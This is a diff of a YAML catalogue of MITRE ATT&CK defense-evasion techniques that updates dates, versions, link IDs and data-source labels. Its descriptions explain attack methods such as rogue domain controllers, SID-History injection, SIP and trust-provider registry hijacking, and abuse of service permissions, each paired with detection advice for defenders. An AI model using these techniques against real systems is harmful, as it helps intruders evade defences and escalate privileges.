rundll32.exe). (Citation: Endgame Masquerade Ball) An + rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)' @@ -38652,7 +31127,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-02-10T20:03:11.691Z' + modified: '2020-11-23T17:03:38.941Z' created: '2020-02-10T20:03:11.691Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -38661,16 +31136,16 @@ defense-evasion: was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but - may not always be indicative of malicious activity. (Citation: Endgame Masquerade + may not always be indicative of malicious activity. (Citation: Elastic Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)' x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters - - Binary file metadata + - 'File: File Modification' + - 'Process: Process Metadata' + - 'Command: Command Execution' + - 'File: File Metadata' x_mitre_platforms: - Linux - macOS @@ -38918,9 +31393,9 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-17T17:36:24.531Z' + modified: '2021-03-08T10:33:02.128Z' created: '2020-06-16T18:42:20.734Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User @@ -38933,16 +31408,13 @@ defense-evasion: is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones. x_mitre_data_sources: - - Stackdriver logs - - GCP audit logs - - Azure activity logs - - AWS CloudTrail logs + - 'Instance: Instance Modification' + - 'Instance: Instance Start' + - 'Instance: Instance Stop' x_mitre_contributors: - Netskope x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS atomic_tests: [] T1036.002: technique: @@ -38983,7 +31455,7 @@ defense-evasion: - macOS - Windows x_mitre_data_sources: - - File monitoring + - 'File: File Metadata' x_mitre_detection: Detection methods should include looking for common formats of RTLO characters within filenames such as \u202E, [U+202E], and %E2%80%AE. Defenders should also check their analysis tools @@ -39002,7 +31474,7 @@ defense-evasion: Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide) - This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) + This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog) external_references: - source_name: mitre-attack external_id: T1207 @@ -39033,7 +31505,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-19T21:04:12.164Z' + modified: '2021-02-09T15:13:27.670Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -39051,10 +31523,10 @@ defense-evasion: x_mitre_defense_bypassed: - Log analysis x_mitre_data_sources: - - API monitoring - - Authentication logs - - Network protocol analysis - - Packet capture + - 'Active Directory: Active Directory Object Creation' + - 'Active Directory: Active Directory Object Modification' + - 'Network Traffic: Network Traffic Content' + - 'User Account: User Account Authentication' x_mitre_contributors: - Vincent Le Toux x_mitre_version: '2.0' @@ -39219,9 +31691,8 @@ defense-evasion: - Application control by file name or path - Anti-virus x_mitre_data_sources: - - BIOS - - MBR - - System calls + - 'Drive: Drive Modification' + - 'Firmware: Firmware Modification' x_mitre_version: '1.1' identifier: T1014 atomic_tests: @@ -39407,12 +31878,11 @@ defense-evasion: - Janantha Marasinghe - Menachem Shafran, XM Cyber x_mitre_data_sources: - - Packet capture - - Host network interface - - Windows Registry - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'File: File Creation' + - 'Command: Command Execution' + - 'Service: Service Creation' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: @@ -39451,7 +31921,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:31:42.113Z' + modified: '2021-01-20T18:12:11.843Z' created: '2020-01-23T18:03:46.248Z' x_mitre_platforms: - Windows @@ -39470,10 +31940,9 @@ defense-evasion: - Application control - Anti-virus x_mitre_data_sources: - - DLL monitoring - - Loaded DLLs - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Module: Module Load' x_mitre_contributors: - Casey Smith - Ricardo Dias @@ -39705,7 +32174,7 @@ defense-evasion: description: |- Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). - With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [Windows Admin Shares](https://attack.mitre.org/techniques/T1077), or [Windows Remote Management](https://attack.mitre.org/techniques/T1028). + With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006). id: attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023 type: attack-pattern kill_chain_phases: @@ -39713,7 +32182,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-26T21:49:31.964Z' + modified: '2021-02-09T15:49:58.414Z' created: '2020-02-18T18:34:49.414Z' x_mitre_contributors: - Alain Homewood, Insomnia Security @@ -39728,9 +32197,9 @@ defense-evasion: Monitor for Windows API calls to the DsAddSidHistory function. (Citation: Microsoft DsAddSidHistory) x_mitre_data_sources: - - Windows event logs - - Authentication logs - - API monitoring + - 'Process: OS API Execution' + - 'User Account: User Account Metadata' + - 'Active Directory: Active Directory Object Modification' x_mitre_platforms: - Windows atomic_tests: [] @@ -39785,12 +32254,12 @@ defense-evasion: Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) (Citation: EduardosBlog SIPs July 2008) to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all (Citation: Microsoft Catalog Files and Signatures April 2017)) and are identified by globally unique identifiers (GUIDs). (Citation: SpectorOps Subverting Trust Sept 2017) - Similar to [Code Signing](https://attack.mitre.org/techniques/T1116), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017) + Similar to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: (Citation: SpectorOps Subverting Trust Sept 2017) * Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP (Citation: GitHub SIP POC Sept 2017) (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file). * Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP (Citation: GitHub SIP POC Sept 2017) (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk. * Modifying the DLL and Function Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex). - * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). + * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017) id: attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc @@ -39798,7 +32267,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:42:26.022Z' + modified: '2021-02-09T15:58:04.719Z' created: '2020-02-05T19:34:04.910Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: true @@ -39822,18 +32291,13 @@ defense-evasion: * HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust * HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust - **Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1117). (Citation: SpectorOps Subverting Trust Sept 2017) + **Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017) Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017) x_mitre_data_sources: - - Windows Registry - - API monitoring - - Application logs - - DLL monitoring - - Loaded DLLs - - Process monitoring - - Windows Registry - - Windows event logs + - 'Module: Module Load' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' x_mitre_contributors: - Matt Graeber, @mattifestation, SpecterOps x_mitre_platforms: @@ -39900,33 +32364,14 @@ defense-evasion: - Process whitelisting - Data Execution Prevention - Exploit Prevention - x_mitre_data_sources: - - Process monitoring - - File monitoring - - Process command-line parameters x_mitre_version: '1.0' x_mitre_is_subtechnique: false x_mitre_deprecated: true atomic_tests: [] T1574.010: technique: - external_references: - - source_name: mitre-attack - external_id: T1574.010 - url: https://attack.mitre.org/techniques/T1574/010 - - external_id: CAPEC-17 - source_name: capec - url: https://capec.mitre.org/data/definitions/17.html - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Services File Permissions Weakness - description: |- - Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. - - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. - id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd - type: attack-pattern + created: '2020-03-12T20:43:53.998Z' + modified: '2020-09-16T19:10:04.262Z' kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence @@ -39934,24 +32379,25 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-16T19:10:04.262Z' - created: '2020-03-12T20:43:53.998Z' - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_data_sources: - - Process command-line parameters - - Services - - File monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - - Administrator - - User - x_mitre_permissions_required: - - Administrator - - User + type: attack-pattern + id: attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd + description: |- + Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. + + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. + name: Services File Permissions Weakness + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.010 + url: https://attack.mitre.org/techniques/T1574/010 + - external_id: CAPEC-17 + source_name: capec + url: https://capec.mitre.org/data/definitions/17.html + x_mitre_platforms: + - Windows x_mitre_detection: "Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected @@ -39960,11 +32406,62 @@ defense-evasion: for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. " - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - SYSTEM + - Administrator + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Service: Service Metadata' + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak atomic_tests: [] T1574.011: technique: + created: '2020-03-13T11:42:14.444Z' + modified: '2020-09-16T19:07:48.590Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c + description: "Adversaries may execute their own malicious payloads by hijacking + the Registry entries used by services. Adversaries may use flaws in the permissions + for registry to redirect from the originally specified executable to one that + they control, in order to launch their own code at Service start. Windows + stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. + The information stored under a service's Registry keys can be manipulated + to modify a service's execution parameters through tools such as the service + controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), + or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys + is controlled through Access Control Lists and permissions. (Citation: Registry + Key Security)\n\nIf the permissions for users and groups are not properly + set and allow access to the Registry keys for a service, then adversaries + can change the service binPath/ImagePath to point to a different executable + under their control. When the service starts or is restarted, then the adversary-controlled + program will execute, allowing the adversary to gain persistence and/or privilege + escalation to the account context the service is set to execute under (local/domain + account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also + alter Registry keys associated with service failure parameters (such as FailureCommand) + that may be executed in an elevated context anytime the service fails or is + intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: + Tweet Registry Perms Weakness) " + name: Services Registry Permissions Weakness + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1574.011 @@ -39988,66 +32485,31 @@ defense-evasion: url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns description: Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Services Registry Permissions Weakness - description: "Adversaries may execute their own malicious payloads by hijacking - the Registry entries used by services. Adversaries may use flaws in the permissions - for registry to redirect from the originally specified executable to one that - they control, in order to launch their own code at Service start. Windows - stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. - The information stored under a service's Registry keys can be manipulated - to modify a service's execution parameters through tools such as the service - controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), - or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys - is controlled through Access Control Lists and permissions. (Citation: Registry - Key Security)\n\nIf the permissions for users and groups are not properly - set and allow access to the Registry keys for a service, then adversaries - can change the service binPath/ImagePath to point to a different executable - under their control. When the service starts or is restarted, then the adversary-controlled - program will execute, allowing the adversary to gain persistence and/or privilege - escalation to the account context the service is set to execute under (local/domain - account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also - alter Registry keys associated with service failure parameters (such as FailureCommand) - that may be executed in an elevated context anytime the service fails or is - intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: - Tweet Registry Perms Weakness) " - id: attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T19:07:48.590Z' - created: '2020-03-13T11:42:14.444Z' - x_mitre_defense_bypassed: - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - SYSTEM - x_mitre_permissions_required: - - Administrator - - User + x_mitre_platforms: + - Windows + x_mitre_contributors: + - Travis Smith, Tripwire + - Matthew Demaske, Adaptforward + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Service: Service Metadata' + - 'Command: Command Execution' x_mitre_detection: |- Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. - x_mitre_data_sources: - - Windows Registry - - Services - - Process command-line parameters - x_mitre_contributors: - - Travis Smith, Tripwire - - Matthew Demaske, Adaptforward - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - SYSTEM + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_defense_bypassed: + - Application control identifier: T1574.011 atomic_tests: - name: Service Registry Permissions Weakness @@ -40150,9 +32612,9 @@ defense-evasion: setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set. x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' x_mitre_platforms: - Linux - macOS @@ -40251,7 +32713,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-21T18:37:15.275Z' + modified: '2021-01-20T18:12:12.134Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -40272,15 +32734,13 @@ defense-evasion: - Hans Christoffer Gaardløs - Praetorian x_mitre_data_sources: - - API monitoring - - File monitoring - - Binary file metadata - - Process use of network - - Windows Registry - - Loaded DLLs - - DLL monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'File: File Creation' + - 'Module: Module Load' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Modification' + - 'Network Traffic: Network Connection Creation' x_mitre_version: '2.1' identifier: T1218 atomic_tests: @@ -40589,8 +33049,9 @@ defense-evasion: x_mitre_contributors: - Praetorian x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Script: Script Execution' x_mitre_version: '1.1' identifier: T1216 atomic_tests: @@ -40682,7 +33143,8 @@ defense-evasion: activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code. x_mitre_data_sources: - - Binary file metadata + - 'File: File Metadata' + - 'File: File Content' x_mitre_contributors: - Filip Kafka, ESET x_mitre_platforms: @@ -40810,8 +33272,7 @@ defense-evasion: x_mitre_contributors: - Erye Hernandez, Palo Alto Networks x_mitre_data_sources: - - File monitoring - - Process monitoring + - 'File: File Metadata' x_mitre_detection: It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the @@ -40837,6 +33298,30 @@ defense-evasion: name: manual T1027.003: technique: + created: '2020-02-05T14:28:16.719Z' + modified: '2020-09-16T19:24:20.350Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916 + description: "Adversaries may use steganography techniques in order to prevent + the detection of hidden information. Steganographic techniques can be used + to hide data in digital media such as images, audio tracks, video clips, or + text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early + example of malware that used steganography. It encrypted the gathered information + from a victim's system and hid it within an image before exfiltrating the + image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a + threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) + commands in an image file (.png) and execute the code on a victim's system. + In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) + code downloaded another obfuscated script to gather intelligence from the + victim's machine and communicate it back to the adversary.(Citation: McAfee + Malicious Doc Targets Pyeongchang Olympics) " + name: Steganography + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1027.003 @@ -40851,42 +33336,18 @@ defense-evasion: description: Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018. source_name: McAfee Malicious Doc Targets Pyeongchang Olympics - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Steganography - description: "Adversaries may use steganography techniques in order to prevent - the detection of hidden information. Steganographic techniques can be used - to hide data in digital media such as images, audio tracks, video clips, or - text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early - example of malware that used steganography. It encrypted the gathered information - from a victim's system and hid it within an image before exfiltrating the - image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a - threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) - commands in an image file (.png) and execute the code on a victim's system. - In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) - code downloaded another obfuscated script to gather intelligence from the - victim's machine and communicate it back to the adversary.(Citation: McAfee - Malicious Doc Targets Pyeongchang Olympics) " - id: attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T19:24:20.350Z' - created: '2020-02-05T14:28:16.719Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_detection: Detection of steganography is difficult unless artifacts - are left behind by the obfuscation process that are detectable with a known - signature. Look for strings are other signatures left in system artifacts - related to decoding steganography. - x_mitre_data_sources: - - Binary file metadata x_mitre_platforms: - Linux - macOS - Windows + x_mitre_data_sources: + - 'File: File Content' + x_mitre_detection: Detection of steganography is difficult unless artifacts + are left behind by the obfuscation process that are detectable with a known + signature. Look for strings are other signatures left in system artifacts + related to decoding steganography. + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' atomic_tests: [] T1553: technique: @@ -40936,23 +33397,20 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:42:26.314Z' + modified: '2021-04-26T15:41:39.612Z' created: '2020-02-05T14:54:07.588Z' x_mitre_platforms: - Windows - macOS - Linux x_mitre_data_sources: - - Binary file metadata - - File monitoring - - Process command-line parameters - - Process monitoring - - API monitoring - - Application logs - - DLL monitoring - - Loaded DLLs - - Windows Registry - - Windows event logs + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' + - 'Module: Module Load' x_mitre_detection: "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry @@ -41033,8 +33491,10 @@ defense-evasion: sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file. x_mitre_data_sources: - - File monitoring - - Process command-line parameters + - 'Process: Process Metadata' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' x_mitre_platforms: - Linux - macOS @@ -41095,7 +33555,7 @@ defense-evasion: before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. \n\nSpecific checks - may will vary based on the target and/or adversary, but may involve behaviors + will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) @@ -41104,8 +33564,8 @@ defense-evasion: the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties - such as uptime and samples of network traffic. Adversaries may also check - the network adapters addresses, CPU core count, and available memory/drive + such as host/domain name and samples of network traffic. Adversaries may also + check the network adapters addresses, CPU core count, and available memory/drive size. \n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific @@ -41138,7 +33598,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-07-01T16:32:02.514Z' + modified: '2021-04-21T15:16:10.604Z' created: '2020-03-06T20:57:37.959Z' x_mitre_platforms: - Linux @@ -41147,8 +33607,9 @@ defense-evasion: x_mitre_contributors: - Deloitte Threat Library Team x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed @@ -41160,7 +33621,7 @@ defense-evasion: or perform other forms of Discovery, especially in a short period of time, may aid in detection. x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_defense_bypassed: - Static File Analysis - Signature-based detection @@ -41283,9 +33744,7 @@ defense-evasion: - McAfee - Ryan Becwar x_mitre_data_sources: - - EFI - - BIOS - - API monitoring + - 'Firmware: Firmware Modification' x_mitre_detection: |- System firmware manipulation may be detected. 